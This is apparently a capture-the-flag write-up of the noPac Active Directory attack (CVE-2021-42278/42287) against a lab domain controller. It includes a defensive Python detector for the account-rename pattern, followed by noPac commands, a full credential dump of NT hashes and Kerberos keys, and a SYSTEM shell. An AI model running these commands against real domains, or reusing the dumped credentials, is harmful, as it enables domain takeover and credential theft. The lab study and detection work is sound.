CVE-2021-42278/CVE-2021-42287


The target might be vulnerable to the CVE-2021-42278 + CVE-2021-42287 chain attack, given that the target host is an older system and does not seem to have the patches installed.

Exploit (noPac)


The CVE-2021-42278 + CVE-2021-42287 chain attack (noPac) works by impersonating a domain controller: a newly added computer account is renamed so that its sAMAccountName is the DC's name without the trailing $ sign (in the run below the account's sAMAccountName is set to fuse), and the KDC then resolves tickets requested for that name to the real DC account.

By default, a standard user in an Active Directory domain has the SeMachineAccountPrivilege right and can add up to 10 devices to the domain; the limit is the ms-DS-MachineAccountQuota attribute.
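Since the chain rests on two observable facts (any authenticated user may create a computer account, and that account is briefly renamed to the DC's name without the $), the corresponding detection is a correlation over Security log events 4741 (computer account created) and 4781 (account name changed). The following Python script is an added example, not part of the original writeup or of the noPac tool; it runs over constructed events modelled on the run shown later in the notes, and the DC account list (FUSE$) and the ten-minute window are assumptions.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class SecurityEvent:
    """Minimal view of a Windows Security event (constructed for this example)."""
    time: datetime
    event_id: int       # 4741 = computer account created, 4781 = account name changed
    subject: str        # SubjectUserName: who performed the action
    target: str         # TargetUserName (4741) / OldTargetUserName (4781)
    new_name: str = ""  # NewTargetUserName, present only on 4781


# Assumed list of domain controller computer accounts; FUSE$ is the DC in the writeup's dump.
DC_ACCOUNTS = {"FUSE$"}


def collides_with_dc(name, dc_accounts=DC_ACCOUNTS):
    """True when `name` equals a DC sAMAccountName with its trailing '$' removed (case-insensitive)."""
    return name.upper() in {dc.rstrip("$").upper() for dc in dc_accounts}


def detect_nopac(events, dc_accounts=DC_ACCOUNTS, window=timedelta(minutes=10)):
    """Scan events in time order and return one finding per rename that collides with a DC name.

    A finding also records whether the renamed account was created within `window`
    beforehand, which is the shape of the automated chain: create, rename, use, restore.
    """
    created = {}   # sAMAccountName (upper) -> (creation time, creating subject)
    findings = []
    for ev in sorted(events, key=lambda e: e.time):
        if ev.event_id == 4741:
            created[ev.target.upper()] = (ev.time, ev.subject)
        elif ev.event_id == 4781 and collides_with_dc(ev.new_name, dc_accounts):
            creation = created.get(ev.target.upper())
            findings.append({
                "time": ev.time,
                "subject": ev.subject,
                "computer_account": ev.target,
                "renamed_to": ev.new_name,
                "created_recently": creation is not None and ev.time - creation[0] <= window,
            })
    return findings


def quota_allows_unprivileged_join(quota):
    """ms-DS-MachineAccountQuota > 0 lets any authenticated user add computer accounts;
    setting it to 0 removes the foothold this chain starts from."""
    return quota > 0


# Constructed sample events, modelled on the noPac run in the writeup (not real log data).
T0 = datetime(2023, 1, 1, 12, 0, 0)
SAMPLE_EVENTS = [
    SecurityEvent(T0 - timedelta(hours=1), 4741, "Administrator", "LAPTOP-01$"),
    SecurityEvent(T0 - timedelta(minutes=50), 4781, "Administrator", "LAPTOP-01$", "LAPTOP-02$"),
    SecurityEvent(T0, 4741, "bnielson", "WIN-NWDSEPB5H7M$"),
    SecurityEvent(T0 + timedelta(seconds=2), 4781, "bnielson", "WIN-NWDSEPB5H7M$", "fuse"),
    SecurityEvent(T0 + timedelta(seconds=5), 4781, "bnielson", "fuse", "WIN-NWDSEPB5H7M$"),
]

if __name__ == "__main__":
    for finding in detect_nopac(SAMPLE_EVENTS):
        print(finding)
    print("quota 10 allows unprivileged join:", quota_allows_unprivileged_join(10))
```

The benign rename of LAPTOP-01$ produces no finding because the new name keeps its $ and matches no DC; the rename to fuse does, and is flagged as coming from an account created seconds earlier by an ordinary user.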

Testing


It was initially revealed that the current user, svc-print, has SeMachineAccountPrivilege enabled. But the reality is that every domain user has it enabled by default.

┌──(kali㉿kali)-[~/…/labs/fuse/SeMachineAccountPrivilege/noPac]
└─$ cme smb $IP -d FABRICORP.LOCAL --kdcHost fuse.fabricorp.local -u bnielson -p Qwer1233 -M nopac
smb         10.10.10.193    445    fuse             [*] windows server 2016 standard 14393 x64 (name:FUSE) (domain:FABRICORP.LOCAL) (signing:True) (SMBv1:True)
smb         10.10.10.193    445    fuse             [+] fabricorp.local\bnielson:Qwer1233 
NOPAC       10.10.10.193    445    FUSE             TGT with PAC size 1488
NOPAC       10.10.10.193    445    FUSE             TGT without PAC size 731
NOPAC       10.10.10.193    445    FUSE             
NOPAC       10.10.10.193    445    FUSE             VULNEABLE
nopac       10.10.10.193    445    fuse             next step: https://github.com/Ridter/noPac

The target system is confirmed to be vulnerable to the noPac exploit

Exploitation


┌──(kali㉿kali)-[~/…/labs/fuse/SeMachineAccountPrivilege/noPac]
└─$ python3 noPac.py 'fabricorp.local/svc-print:$fab@s3Rv1ce$1' -dc-ip $IP -use-ldap -dump -just-dc
 
███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
    
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target fuse.fabricorp.local
[*] Total Domain Admins 2
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-NWDSEPB5H7M$"
[*] MachineAccount "WIN-NWDSEPB5H7M$" password = OBzD90Gr@LTn
[*] Successfully added machine account WIN-NWDSEPB5H7M$ with password OBzD90Gr@LTn.
[*] WIN-NWDSEPB5H7M$ object = CN=WIN-NWDSEPB5H7M,CN=Computers,DC=fabricorp,DC=local
[*] WIN-NWDSEPB5H7M$ sAMAccountName == fuse
[*] Saving a DC's ticket in fuse.ccache
[*] Reseting the machine account to WIN-NWDSEPB5H7M$
[*] Restored WIN-NWDSEPB5H7M$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] 	Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_fuse.fabricorp.local.ccache
[*] Attempting to del a computer with the name: WIN-NWDSEPB5H7M$
[-] Delete computer WIN-NWDSEPB5H7M$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:370ddcf45959b2293427baa70376e14e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8ee7fac1bd38751dbff06b33616b87b0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc-print:1104:aad3b435b51404eeaad3b435b51404ee:38485fd7730cca53473d0fa6ed27aa71:::
bnielson:1105:aad3b435b51404eeaad3b435b51404ee:8873f0c964ab36700983049e2edd0f77:::
sthompson:1601:aad3b435b51404eeaad3b435b51404ee:5fb3cc8b2f45791e200d740725fdf8fd:::
tlavel:1602:aad3b435b51404eeaad3b435b51404ee:8873f0c964ab36700983049e2edd0f77:::
pmerton:1603:aad3b435b51404eeaad3b435b51404ee:e76e0270c2018153275aab1e143421b2:::
svc-scan:1605:aad3b435b51404eeaad3b435b51404ee:38485fd7730cca53473d0fa6ed27aa71:::
bhult:7101:aad3b435b51404eeaad3b435b51404ee:8873f0c964ab36700983049e2edd0f77:::
dandrews:7102:aad3b435b51404eeaad3b435b51404ee:689583f00ad18c124c58405479b4c536:::
mberbatov:7601:aad3b435b51404eeaad3b435b51404ee:b2bdbe60565b677dfb133866722317fd:::
astein:7602:aad3b435b51404eeaad3b435b51404ee:2f74c867a93cda5a255b1d8422192d80:::
dmuir:7603:aad3b435b51404eeaad3b435b51404ee:6320f0682f940651742a221d8218d161:::
FUSE$:1000:aad3b435b51404eeaad3b435b51404ee:ef512830838e8fcb017517c4ce3dbd97:::
WIN-QQORJ74HXTE$:10601:aad3b435b51404eeaad3b435b51404ee:d488a6ff29b28a99faa98ea31d1dd164:::
WIN-NWDSEPB5H7M$:10602:aad3b435b51404eeaad3b435b51404ee:9a746886a67b834b0bf47d5843bac22f:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:e6dcafd3738f9433358d59ef8015386a8c0a418a09b3e8968f8a00c6fa077984
Administrator:aes128-cts-hmac-sha1-96:83c4a7c2b6310e0b2323d7c67c9a8d68
Administrator:des-cbc-md5:0dfe83ce576d8aae
krbtgt:aes256-cts-hmac-sha1-96:5a844c905bc3ea680729e0044a00a817bb8e6b8a89c01b0d2f949e2d7ac9952e
krbtgt:aes128-cts-hmac-sha1-96:67f0c1ace3b5a9f43e90a00c1e5445c6
krbtgt:des-cbc-md5:49d93d43321f02b3
svc-print:aes256-cts-hmac-sha1-96:f06c128c73c7a4a2a6817ee22ce59979eac9789adf7043acbf11721f3b07b754
svc-print:aes128-cts-hmac-sha1-96:b662d12fedf3017aed71b2bf96ac6a99
svc-print:des-cbc-md5:fea11fdf6bd3105b
bnielson:aes256-cts-hmac-sha1-96:62aef12b7b5d68fe508b5904d2966a27f98ad83b5ca1fb9930bbcf420c2a16b6
bnielson:aes128-cts-hmac-sha1-96:70140834e3319d7511afa5c5b9ca4b32
bnielson:des-cbc-md5:9826c42010254a76
sthompson:aes256-cts-hmac-sha1-96:e93eb7d969f30a4acb55cff296599cc31f160cca523a63d3b0f9eba2787e63a5
sthompson:aes128-cts-hmac-sha1-96:a8f79b1eb4209a0b388d1bb99b94b0d9
sthompson:des-cbc-md5:4f9291c46291ba02
tlavel:aes256-cts-hmac-sha1-96:f415075d6b6566912c97a4e9a0249b2b209241c341534cb849b657711de11525
tlavel:aes128-cts-hmac-sha1-96:9ac52b65b9013838f129bc9a99826a4f
tlavel:des-cbc-md5:2a238576ab7a6213
pmerton:aes256-cts-hmac-sha1-96:102465f59909683f260981b1d93fa7d0f45778de11b636002082575456170db7
pmerton:aes128-cts-hmac-sha1-96:4dc80267b0b2ecc02e437aef76714710
pmerton:des-cbc-md5:ef3794940d6d0120
svc-scan:aes256-cts-hmac-sha1-96:053a97a7a728359be7aa5f83d3e81e81637ec74810841cc17acd1afc29850e5c
svc-scan:aes128-cts-hmac-sha1-96:1ae5f4fecd5b3bd67254d21f6adb6d56
svc-scan:des-cbc-md5:e30b208ccecd57ad
bhult:aes256-cts-hmac-sha1-96:f1097eb00e508bf95f4756a28f18f490c40ed3274b2fd67da8919647591e2c74
bhult:aes128-cts-hmac-sha1-96:b1f2affb4c9d4c70b301923cc5d89336
bhult:des-cbc-md5:4a1a209d4532a7b9
dandrews:aes256-cts-hmac-sha1-96:d2c7389d3185d2e68e47d227d817556349967cac1d5bfacb780aaddffeb34dce
dandrews:aes128-cts-hmac-sha1-96:497bd974ccfd3979edb0850dc65fa0a8
dandrews:des-cbc-md5:9ec2b53eae6b20f2
mberbatov:aes256-cts-hmac-sha1-96:11abccced1c06bfae96b0309c533812976b5b547d2090f1eaa590938afd1bc4a
mberbatov:aes128-cts-hmac-sha1-96:fc50f72a3f79c2abc43d820f849034da
mberbatov:des-cbc-md5:8023a16b9b3d5186
astein:aes256-cts-hmac-sha1-96:7f43bea8fd662b275434644b505505de055cdfa39aeb0e3794fec26afd077735
astein:aes128-cts-hmac-sha1-96:0d27194d0733cf16b5a19281de40ad8b
astein:des-cbc-md5:254f802902f8ec7a
dmuir:aes256-cts-hmac-sha1-96:67ffc8759725310ba34797753b516f57e0d3000dab644326aea69f1a9e8fedf0
dmuir:aes128-cts-hmac-sha1-96:692fde98f45bf520d494f50f213c6762
dmuir:des-cbc-md5:7fb515d59846498a
FUSE$:aes256-cts-hmac-sha1-96:a4e36245565e043b157986cb689f83ff347a2e66aa37949940229355d14c1341
FUSE$:aes128-cts-hmac-sha1-96:c4c7808e60de73f759ba75644933635d
FUSE$:des-cbc-md5:9b028f686123a21f
WIN-QQORJ74HXTE$:aes256-cts-hmac-sha1-96:aff53fbe21e11ea262cc42eddc253aa9c5e5fe5db2ef77772e1ddeac2c0d0330
WIN-QQORJ74HXTE$:aes128-cts-hmac-sha1-96:a3744ca333bb7c56360d8d23dcf2837a
WIN-QQORJ74HXTE$:des-cbc-md5:299e89ecf7673bae
WIN-NWDSEPB5H7M$:aes256-cts-hmac-sha1-96:c1735a355f300c970196d0da025ddb3a23e1d5563e339aa8c70e12ceb0c2a60f
WIN-NWDSEPB5H7M$:aes128-cts-hmac-sha1-96:5e613b277b8da60425b027e3823c3a78
WIN-NWDSEPB5H7M$:des-cbc-md5:fb1ac4a48fad10f1
[*] Cleaning up... 

Domain Level Compromise

Shelldrop


┌──(kali㉿kali)-[~/…/labs/fuse/SeMachineAccountPrivilege/noPac]
└─$ python3 nopac.py 'fabricorp.local/bnielson:Qwer1234' -dc-ip $IP -use-ldap -shell 
 
███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
    
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target fuse.fabricorp.local
[*] Total Domain Admins 2
[*] will try to impersonate sthompson
[*] Already have user sthompson ticket for target fuse.fabricorp.local
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute
c:\Windows\system32> whoami
nt authority\system
 
c:\Windows\system32> hostname
Fuse
 
c:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::bb
   ipv6 address. . . . . . . . . . . : dead:beef::a503:3c1b:a607:49b2
   link-local ipv6 address . . . . . : fe80::a503:3c1b:a607:49b2%5
   ipv4 address. . . . . . . . . . . : 10.10.10.193
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%5
                                       10.10.10.2
 
tunnel adapter isatap.{af2c7a34-a136-4854-894e-84f30da6c214}:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . : htb

This time I used the credentials of the bnielson user to prove that it can be done as long as there is a valid domain credential. That is because every single domain user, by default, can add up to 10 machines, meaning that the ms-DS-MachineAccountQuota attribute is set to 10.

GG